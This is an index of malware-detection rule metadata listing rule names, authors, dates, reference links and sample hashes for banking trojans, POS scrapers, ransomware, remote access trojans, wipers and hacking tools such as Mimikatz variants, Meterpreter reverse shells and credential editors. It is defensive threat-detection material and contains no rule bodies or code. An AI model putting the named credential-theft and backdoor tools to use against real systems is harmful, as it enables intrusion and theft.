malware_index Shifu reference: https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/ author: McAfee Labs
malware_index skeleton_key_patcher description: Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN author: Dell SecureWorks Counter Threat Unit reference: http://goo.gl/aAk3lN date: 2015/01/13 score: 70
malware_index skeleton_key_injected_code description: Skeleton Key injected Code http://goo.gl/aAk3lN author: Dell SecureWorks Counter Threat Unit reference: http://goo.gl/aAk3lN date: 2015/01/13 score: 70
malware_index Spora author: pekeinfo date: 2017-02-22 description: Spora
malware_index unk_packer author: pekeinfo date: 2017-02-22 description: Spora & Cerber ek
malware_index with_sqlite author: Julian J. Gonzalez <info@seguridadparatodos.es> reference: http://www.st2labs.com description: Rule to detect the presence of SQLite data in raw image
malware_index universal_1337_stealer_serveur author: Kevin Falcoz date: 24/02/2013 description: Universal 1337 Stealer Serveur
malware_index RSharedStrings description: identifiers for remote and gmremote author: Katie Kleemola last_updated: 07-21-2014
malware_index GmRemoteStrings description: identifiers for gmremote: surtr stage 2 author: Katie Kleemola last_updated: 07-21-2014
malware_index GmRemote description: identifier for gmremote author: Katie Kleemola last_updated: 07-25-2014
malware_index SurtrStrings author: Katie Kleemola description: Strings for Surtr last_updated: 2014-07-16
malware_index SurtrCode author: Katie Kleemola description: Code features for Surtr Stage1 last_updated: 2014-07-16
malware_index Surtr author: Katie Kleemola description: Rule for Surtr Stage One last_updated: 2014-07-16
malware_index T5000Strings description: T5000 Identifying Strings author: Seth Hardy last_modified: 2014-06-26
malware_index T5000 description: T5000 author: Seth Hardy last_modified: 2014-06-26
malware_index Tedroo author: Kevin Falcoz date: 22/11/2015 description: Tedroo Spammer
malware_index Tinba2 author: n3sfox <n3sfox@gmail.com> date: 2015/11/07 description: Tinba 2 (DGA) banking trojan reference: https://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world filetype: memory hash1: c7f662594f07776ab047b322150f6ed0 hash2: dc71ef1e55f1ddb36b3c41b1b95ae586 hash3: b788155cb82a7600f2ed1965cffc1e88
malware_index ELF_Linux_Torte_domains author: @mmorenog,@yararules description: Detects ELF Linux/Torte infection ref1: http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html
malware_index TreasureHunt author: Minerva Labs ref: http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed date: 2016/06 maltype: Point of Sale (POS) Malware filetype: exe
malware_index urausy_skype_dat author: AlienVault Labs description: Yara rule to match against memory of processes infected by Urausy skype.dat
malware_index VidgrabStrings description: Vidgrab Identifying Strings author: Seth Hardy last_modified: 2014-06-20
malware_index Vidgrab description: Vidgrab author: Seth Hardy last_modified: 2014-06-20
malware_index Wabot author: Kevin Falcoz date: 14/08/2015 description: Wabot Trojan Worm
malware_index WarpCode description: Warp code features author: Seth Hardy last_modified: 2014-07-10
malware_index WarpStrings description: Warp Identifying Strings author: Seth Hardy last_modified: 2014-07-10
malware_index Warp description: Warp author: Seth Hardy last_modified: 2014-07-10
malware_index WimmieShellcode description: Wimmie code features author: Seth Hardy last_modified: 2014-07-17
malware_index WimmieStrings description: Strings used by Wimmie author: Seth Hardy last_modified: 2014-07-17
malware_index Wimmie description: Wimmie family author: Seth Hardy last_modified: 2014-07-17
malware_index XMRIG_Miner ref: https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e
malware_index XOR_DDosv1 author: Akamai CSIRT description: Rule to detect XOR DDos infection
malware_index YayihCode description: Yayih code features author: Seth Hardy last_modified: 2014-07-11
malware_index YayihStrings description: Yayih Identifying Strings author: Seth Hardy last_modified: 2014-07-11
malware_index Yayih description: Yayih author: Seth Hardy last_modified: 2014-07-11
malware_index Zegost author: Kevin Falcoz date: 10/06/2013 description: Zegost Trojan
malware_index Windows_Malware_Zeus author: Xylitol xylitol@malwareint.com date: 2014-03-03 description: Match first two bytes, protocol and string present in Zeus 1.1.3.4 reference: http://www.xylibox.com/2014/03/zeus-1134.html
malware_index viotto_keylogger
malware_index xDedic_SysScan_unpacked author: Kaspersky Lab ref: https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf maltype: crimeware type: crimeware filetype: Win32 EXE date: 2016-03-14 version: 1.0 hash: F661b50d45400e7052a2427919e2f777
malware_index DeltaCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaAlfa_One copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaBravo_PapaAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaBravo_RomeoCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 58ad28ac4fb911abb6a20382456c4ad6fe5c8ee5.ex_ Status: Signature is too loose to be useful.
malware_index IndiaBravo_RomeoBravo copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 6e3db4da27f12eaba005217eba7cd9133bc258c97fe44605d12e20a556775009
malware_index IndiaBravo_generic copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaCharlie_One copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index IndiaCharlie_Two copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index LimaCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source_x86: 6ee6ae79ee1502a11ece81e971a54f189a271be9ec700101a2bd7a21198b94c7 Source_x64: 90ace24eb132c776a6d5bb0451437db21e84601495a2165d75f520af637e71e8
malware_index PapaAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index RomeoCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: a82108ef7115931b3fbe1fab99448c4139e22feda27c1b1d29325710671154e8
malware_index RomeoEcho copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index RomeoFoxtrot copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: dropped.bin Source_relativeCalls: 635bebe95671336865f8a546f06bf67ab836ea35795581d8a473ef2cd5ff4a7f
malware_index SierraBravo_packed copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index SierraCharlie copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: f4750e1d82b08318bdc1eb6d3399dee52750250f7959a5e4f83245449f399698.bin
malware_index RomeoJuliettMikeTwo copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 819722ba1c5b9d0b360c54cbdd3811d0cac1a9230720b3ed4815f78bcacb3653_d1ba9ba2987f59d99ce4bf09393c0521c4d1f2961c5aeed4e0bf86e78303d27c
malware_index TangoAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index WhiskeyAlfa copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com Source: 1c66e67a8531e3ff1c64ae57e6edfde7bef2352d.ex_
malware_index WhiskeyDelta copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group trig@novetta.com Source: 41badf10ef6f469dd1c3be201aba809f9c42f86ad77d7f83bc3895bfa289c635
malware_index Lightweight_Backdoor1
malware_index LightweightBackdoor2
malware_index LightweightBackdoor3
malware_index LightweightBackdoor4
malware_index LightweightBackdoor5
malware_index LightweightBackdoor6
malware_index ProxyTool1
malware_index ProxyTool2
malware_index ProxyTool3
malware_index DestructiveTargetCleaningTool5
malware_index DestructiveTargetCleaningTool6
malware_index DestructiveTargetCleaningTool7
malware_index Malwareusedbycyberthreatactor1
malware_index Malwareusedbycyberthreatactor2
malware_index Malwareusedbycyberthreatactor3
malware_index wiper_unique_strings copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com company: novetta
malware_index wiper_encoded_strings copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com company: novetta
malware_index createP2P copyright: 2015 Novetta Solutions author: Novetta Threat Research & Interdiction Group - trig@novetta.com
malware_index dump_tool author: @patrickrolsen reference: Related to pwdump6 and fgdump tools
malware_index misc_pos author: @patrickrolsen reference: POS Malware
malware_index unknown author: @patrickrolsen reference: Unknown POS
malware_index regex_pos author: @patrickrolsen reference: POS malware - Regex
malware_index regexpr_pos author: @patrickrolsen reference: POS malware - RegExpr
malware_index reg_pos author: @patrickrolsen reference: POS malware - RegExpr
malware_index sets_pos author: @patrickrolsen reference: POS malware - Sets
malware_index monitor_tool_pos author: @patrickrolsen reference: POS malware - Monitoring Tool??
malware_index keyfinder_tool author: @patrickrolsen reference: Magical Jelly Bean KeyFinder
malware_index memdump_diablo author: @patrickrolsen reference: Process Memory Dumper - DiabloHorn
malware_index blazingtools author: @patrickrolsen reference: Blazing Tools - http://www.blazingtools.com (Keyloggers)
malware_index sysocmgr author: @patrickrolsen reference: System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444
malware_index lacy_keylogger author: @patrickrolsen reference: Appears to be a form of keylogger.
malware_index searchinject author: @patrickrolsen reference: Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)
malware_index heistenberg_pos author: @patrickrolsen reference: POS Malware
malware_index pos_jack author: @patrickrolsen maltype: Point of Sale (POS) Malware version: 0.1 reference: http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html date: 2/22/2014
malware_index pos_memory_scrapper_ author: @patrickrolsen maltype: Point of Sale (POS) Malware Memory Scraper version: 0.3 description: POS Memory Scraper date: 01/30/2014
malware_index pos_uploader author: @patrickrolsen maltype: Point of Sale (POS) Malware reference: http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware version: 0.1 description: Testing the base64 encoded file in sys32 date: 01/30/2014
malware_index pos_chewbacca author: @patrickrolsen maltype: Point of Sale (POS) Malware reference: https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware hashes: 21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54 version: 0.2 description: Testing the base64 encoded file in sys32 date: 01/30/2014
malware_index BernhardPOS author: Nick Hoffman / Jeremy Humble last_update: 2015-07-14 source: Morphick Inc. description: BernhardPOS Credit Card dumping tool reference: http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick md5: e49820ef02ba5308ff84e4c8c12e7c3d score: 70
malware_index easterjackpos author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-09-02 description: Identify JackPOS
malware_index LogPOS author: Morphick Security description: Detects Versions of LogPOS md5: af13e7583ed1b27c4ae219e344a37e2b
malware_index Mozart author: Nick Hoffman - Morphick Inc description: Detects samples of the Mozart POS RAM scraping utility reference: http://securitykitten.github.io/the-mozart-ram-scraper/
malware_index Ransom_CryptXXX_Dropper description: Regla para detectar RANSOM.CRYPTXXX author: CCN-CERT version: 1.0 ref: https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html
malware_index Ransom_CryptXXX_Real description: Regla para detectar Ransom.CryptXXX original author: CCN-CERT version: 1.0 ref: https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html
malware_index legion_777 author: Daxda (https://github.com/Daxda) date: 2016/6/6 description: Detects an UPX-unpacked .777 ransomware binary. ref: https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion category: Ransomware sample: SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548
malware_index Ransom_Alpha description: Regla para detectar Ransom.Alpha (posibles falsos positivos) author: CCN-CERT version: 1.0
malware_index Ransom_Alfa description: Regla para detectar W32/Filecoder.Alfa (Posibles falsos positivos) author: CCN-CERT version: 1.0
malware_index cerber3 author: pekeinfo date: 2016-09-09 description: Cerber3
malware_index cerber4 author: pekeinfo date: 2016-09-09 description: Cerber4
malware_index cerber5 author: pekeinfo date: 2016-12-02 description: Cerber5
malware_index Ransom weight: 1 Author: @pekeinfo reference: https://github.com/pekeinfo/DecryptCrypren
malware_index CryptoLocker_set1 author: Christiaan Beek, Christiaan_Beek@McAfee.com date: 2014-04-13 description: Detection of Cryptolocker Samples
malware_index CryptoLocker_rule2 author: Christiaan Beek, Christiaan_Beek@McAfee.com date: 2014-04-14 description: Detection of CryptoLocker Variants
malware_index BackdoorFCKG author: ISG date: 2015-01-20 reference: https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker description: CTB_Locker
malware_index DMALocker Description: Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0 ref: https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/ Author: SadFud Date: 30/05/2016
malware_index DMALocker4 Description: Deteccion del ransomware DMA Locker version 4.0 ref: https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/ Author: SadFud Date: 30/05/2016 Hash: e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1
malware_index Locky_Ransomware description: Detects Locky Ransomware (matches also on Win32/Kuluoz) author: Florian Roth (with the help of binar.ly) reference: https://goo.gl/qScSrE date: 2016-02-17 hash: 5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8
malware_index Locky_Ransomware_2 description: Regla para detectar RANSOM.LOCKY author: CCN-CERT version: 1.0
malware_index Ransom_Petya description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 author: CCN-CERT version: 1.0
malware_index Ransom_Satana description: Regla para detectar Ransom.Satana author: CCN-CERT version: 1.0
malware_index Ransom_Satana_Dropper description: Regla para detectar el dropper de Ransom.Satana author: CCN-CERT version: 1.0
malware_index TeslaCrypt description: Regla para detectar Tesla con md5 author: CCN-CERT version: 1.0
malware_index Win32Toxic author: @GelosSnake date: 2015-06-02 description: https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us sample_filetype: exe yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
malware_index Adzok author: Kevin Breen <kevin@techanarchy.net> Description: Adzok Rat Versions: Free 1.0.0.3, date: 2015/05 ref: http://malwareconfig.com/stats/Adzok maltype: Remote Access Trojan filetype: jar
malware_index BlackShades2 author: Kevin Falcoz date: 26/06/2013 description: BlackShades Server
malware_index BlackShades_4 description: BlackShades author: Jean-Philippe Teissier / @Jipe_ date: 2013-01-12 filetype: memory version: 1.0
malware_index BlackShades author: Kevin Falcoz date: 26/06/2013 description: BlackShades Server
malware_index BlackShades_25052015 author: Brian Wallace (@botnet_hunter) date: 2014/04 ref: http://blog.cylance.com/a-study-in-bots-blackshades-net family: blackshades
malware_index Bolonyokte description: UnknownDotNet RAT - Bolonyokte author: Jean-Philippe Teissier / @Jipe_ date: 2013-02-01 filetype: memory version: 1.0
malware_index Bozok author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Bozok maltype: Remote Access Trojan filetype: exe
malware_index Cerberus description: Cerberus author: Jean-Philippe Teissier / @Jipe_ date: 2013-01-12 filetype: memory version: 1.0
malware_index Crimson author: Kevin Breen <kevin@techanarchy.net> Description: Crimson Rat date: 2015/05 ref: http://malwareconfig.com/stats/Crimson maltype: Remote Access Trojan filetype: jar
malware_index CyberGate author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/CyberGate maltype: Remote Access Trojan filetype: exe
malware_index DarkComet_2 description: DarkComet author: Jean-Philippe Teissier / @Jipe_ date: 2013-01-12 filetype: memory version: 1.0
malware_index DarkComet_3 author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/DarkComet maltype: Remote Access Trojan filetype: exe
malware_index DarkComet_4 reference: https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara
malware_index CSIT_14003_03 Author: CrowdStrike, Inc Date: 2014/05/13 Description: Flying Kitten Installer Reference: http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten
malware_index gh0st author: https://github.com/jackcr/
malware_index gholeeV1 Author: @GelosSnake Date: 2014/08 Description: Gholee first discovered variant Reference: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
malware_index MW_gholee_v1 Author: @GelosSnake description: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html date: 2014-08 maltype: Remote Access Trojan sample_filetype: dll hash0: 48573a150562c57742230583456b4c02
malware_index glassrat author: Brian Wallace @botnet_hunter
malware_index Win32OPCHavex Author: BAE Systems Date: 2014/06/23 Description: Rule for identifying OPC version of HAVEX Reference: www.f-secure.com/weblog/archives/00002718.html
malware_index Win32FertgerHavex Author: BAE Systems Date: 2014/06/23 Description: Rule for identifying Fertger version of HAVEX Reference: www.f-secure.com/weblog/archives/00002718.html
malware_index Havex_Trojan_PHP_Server Author: Florian Roth Date: 2014/06/24 Description: Detects the PHP server component of the Havex RAT Reference: www.f-secure.com/weblog/archives/00002718.html
malware_index Indetectables_RAT description: Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux author: Florian Roth reference: http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/ date: 2015-10-01 super_rule: 1 hash1: 081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105 hash2: 66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229 hash3: 1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801
malware_index Meterpreter_Reverse_Tcp author: chort (@chort0) description: Meterpreter reverse TCP backdoor in memory. Tested on Win7x64.
malware_index NetWiredRC_B description: NetWiredRC author: Jean-Philippe Teissier / @Jipe_ date: 2014-12-23 filetype: memory version: 1.1
malware_index Njrat description: Njrat author: botherder https://github.com/botherder
malware_index njrat1 author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-05-27 description: Identify njRat
malware_index win_exe_njRAT author: info@fidelissecurity.com descripion: njRAT - Remote Access Trojan comment: Variants have also been observed obfuscated with .NET Reactor filetype: pe date: 2013-07-15 version: 1.0 hash1: 92ee1fb5df21d8cfafa2b02b6a25bd3b hash2: 3576d40ce18bb0349f9dfa42b8911c3a hash3: 24cc5b811a7f9591e7f2cb9a818be104 hash4: 3ad5fded9d7fdf1c2f6102f4874b2d52 hash5: a98b4c99f64315aac9dd992593830f35 hash6: 5fcb5282da1a2a0f053051c8da1686ef hash7: a669c0da6309a930af16381b18ba2f9d hash8: 79dce17498e1997264346b162b09bde8 hash9: fc96a7e27b1d3dab715b2732d5c86f80 ref1: http://bit.ly/19tlf4s ref2: http://www.fidelissecurity.com/threatadvisory ref3: http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njratuncovered.html ref4: http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf
malware_index network_traffic_njRAT author: info@fidelissecurity.com descripion: njRAT - Remote Access Trojan comment: Rule to alert on network traffic indicators filetype: PCAP - Network Traffic date: 2013-07-15 version: 1.0 hash1: 92ee1fb5df21d8cfafa2b02b6a25bd3b hash2: 3576d40ce18bb0349f9dfa42b8911c3a hash3: 24cc5b811a7f9591e7f2cb9a818be104 hash4: 3ad5fded9d7fdf1c2f6102f4874b2d52 hash5: a98b4c99f64315aac9dd992593830f35 hash6: 5fcb5282da1a2a0f053051c8da1686ef hash7: a669c0da6309a930af16381b18ba2f9d hash8: 79dce17498e1997264346b162b09bde8 hash9: fc96a7e27b1d3dab715b2732d5c86f80 ref1: http://bit.ly/19tlf4s ref2: http://www.fidelissecurity.com/threatadvisory ref3: http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html ref4: http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf
malware_index PlugXStrings description: PlugX Identifying Strings author: Seth Hardy last_modified: 2014-06-12
malware_index plugX author: Jean-Philippe Teissier / @Jipe_ description: PlugX RAT date: 2014-05-13 filetype: memory version: 1.0 ref1: https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py
malware_index PoisonIvy_2 author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/PoisonIvy maltype: Remote Access Trojan filetype: exe
malware_index AAR author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/AAR maltype: Remote Access Trojan filetype: exe
malware_index Ap0calypse author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Ap0calypse maltype: Remote Access Trojan filetype: exe
malware_index Arcom author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Arcom maltype: Remote Access Trojan filetype: exe
malware_index BlackNix author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/BlackNix maltype: Remote Access Trojan filetype: exe
malware_index BlueBanana author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/BlueBanana maltype: Remote Access Trojan filetype: Java
malware_index ClientMesh author: Kevin Breen <kevin@techanarchy.net> date: 2014/06 ref: http://malwareconfig.com/stats/ClientMesh family: torct
malware_index DarkRAT author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/DarkRAT maltype: Remote Access Trojan filetype: exe
malware_index Greame author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Greame maltype: Remote Access Trojan filetype: exe
malware_index HawkEye author: Kevin Breen <kevin@techanarchy.net> date: 2015/06 ref: http://malwareconfig.com/stats/HawkEye maltype: KeyLogger filetype: exe
malware_index Imminent author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Imminent maltype: Remote Access Trojan filetype: exe
malware_index Infinity author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Infinity maltype: Remote Access Trojan filetype: exe
malware_index JavaDropper author: Kevin Breen <kevin@techanarchy.net> date: 2015/10 ref: http://malwareconfig.com/stats/AlienSpy maltype: Remote Access Trojan filetype: exe
malware_index LostDoor author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/LostDoor maltype: Remote Access Trojan filetype: exe
malware_index LuminosityLink author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/LuminosityLink maltype: Remote Access Trojan filetype: exe
malware_index LuxNet author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/LuxNet maltype: Remote Access Trojan filetype: exe
malware_index NanoCore author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/NanoCore maltype: Remote Access Trojan filetype: exe
malware_index Paradox author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Paradox maltype: Remote Access Trojan filetype: exe
malware_index Plasma author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Plasma maltype: Remote Access Trojan filetype: exe
malware_index PredatorPain author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/PredatorPain maltype: Remote Access Trojan filetype: exe
malware_index Punisher author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Punisher maltype: Remote Access Trojan filetype: exe
malware_index PythoRAT author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/PythoRAT maltype: Remote Access Trojan filetype: exe
malware_index QRat author: Kevin Breen @KevTheHermit date: 2015/08 ref: http://malwareconfig.com maltype: Remote Access Trojan filetype: jar
malware_index SmallNet author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/SmallNet maltype: Remote Access Trojan filetype: exe
malware_index SpyGate author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/SpyGate maltype: Remote Access Trojan filetype: exe
malware_index Sub7Nation author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Sub7Nation maltype: Remote Access Trojan filetype: exe
malware_index UPX author: Kevin Breen <kevin@techanarchy.net> date: 2014/04
malware_index Vertex author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Vertex maltype: Remote Access Trojan filetype: exe
malware_index unrecom author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/AAR maltype: Remote Access Trojan filetype: exe
malware_index ShadowTech author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/ShadowTech maltype: Remote Access Trojan filetype: exe
malware_index shimrat description: Detects ShimRat and the ShimRat loader author: Yonathan Klijnsma (yonathan.klijnsma@fox-it.com) date: 20/11/2015 ref: https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/
malware_index shimratreporter description: Detects ShimRatReporter author: Yonathan Klijnsma (yonathan.klijnsma@fox-it.com) date: 20/11/2015 ref: https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/
malware_index TerminatorRat description: Terminator RAT author: Jean-Philippe Teissier / @Jipe_ date: 2013-10-24 filetype: memory version: 1.0 ref1: http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html
malware_index TROJAN_Notepad_shell_crew author: RSA_IR Date: 4Jun13 File: notepad.exe v 1.1 MD5: 106E63DBDA3A76BEEB53A8BBD8F98927
malware_index xtreme_rat author: Kevin Falcoz date: 23/02/2013 description: Xtreme RAT
malware_index XtremeRATCode description: XtremeRAT code features author: Seth Hardy last_modified: 2014-07-09
malware_index XtremeRATStrings description: XtremeRAT Identifying Strings author: Seth Hardy last_modified: 2014-07-09
malware_index XtremeRAT description: XtremeRAT author: Seth Hardy last_modified: 2014-07-09
malware_index xtremrat author: Jean-Philippe Teissier / @Jipe_ description: Xtrem RAT v3.5 date: 2012-07-12 version: 1.0 filetype: memory
malware_index zoxPNG_RAT Author: Novetta Advanced Research Group Date: 2014/11/14 Description: ZoxPNG RAT, url inside Reference: http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf
malware_index xRAT author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/xRat maltype: Remote Access Trojan filetype: exe
malware_index xRAT20 author: Rottweiler date: 2015-08-20 description: Identifies xRAT 2.0 samples maltype: Remote Access Trojan hash0: cda610f9cba6b6242ebce9f31faf5d9c hash1: 60d7b0d2dfe937ac6478807aa7043525 hash2: d1b577fbfd25cc5b873b202cfe61b5b8 hash3: 1820fa722906569e3f209d1dab3d1360 hash4: 8993b85f5c138b0afacc3ff04a2d7871 hash5: 0c231ed8a800b0f17f897241f1d5f4e3 hash8: 2c198e3e0e299a51e5d955bb83c62a5e sample_filetype: exe yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
malware_index HTTPSCANNER description: Chinese Hacktool Set - file HTTPSCANNER.EXE author: Florian Roth reference: http://tools.zjqhr.com/ date: 2015-06-13 hash: ae2929346944c1ea3411a4562e9d5e2f765d088a
malware_index dubrute author: Christian Rebischke (@sh1bumi) date: 2015-09-05 description: Rules for DuBrute Bruteforcer in_the_wild: True family: Hackingtool/Bruteforcer
malware_index Powerkatz_DLL_Generic description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible) author: Florian Roth reference: PowerKatz Analysis date: 2016-02-05 super_rule: 1 score: 80 hash1: c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae hash2: 1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0 hash3: 49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872
malware_index WindowsCredentialEditor description: Windows Credential Editor threat_level: 10 score: 90
malware_index Amplia_Security_Tool description: Amplia Security Tool score: 60 nodeepdive: 1
malware_index PScan_Portscan_1 description: PScan - Port Scanner author: F. Roth score: 50
malware_index HackTool_Samples description: Hacktool score: 50
malware_index Fierce2 author: Florian Roth description: This signature detects the Fierce2 domain scanner date: 07/2014 score: 60
malware_index Ncrack author: Florian Roth description: This signature detects the Ncrack brute force tool date: 07/2014 score: 60
malware_index SQLMap author: Florian Roth description: This signature detects the SQLMap SQL injection tool date: 07/2014 score: 60
malware_index PortScanner description: Auto-generated rule on file PortScanner.exe author: yarGen Yara Rule Generator by Florian Roth hash: b381b9212282c0c650cb4b0323436c63
malware_index NetBIOS_Name_Scanner description: Auto-generated rule on file NetBIOS Name Scanner.exe author: yarGen Yara Rule Generator by Florian Roth hash: 888ba1d391e14c0a9c829f5a1964ca2c
malware_index FeliksPack3___Scanners_ipscan description: Auto-generated rule on file ipscan.exe author: yarGen Yara Rule Generator by Florian Roth hash: 6c1bcf0b1297689c8c4c12cc70996a75
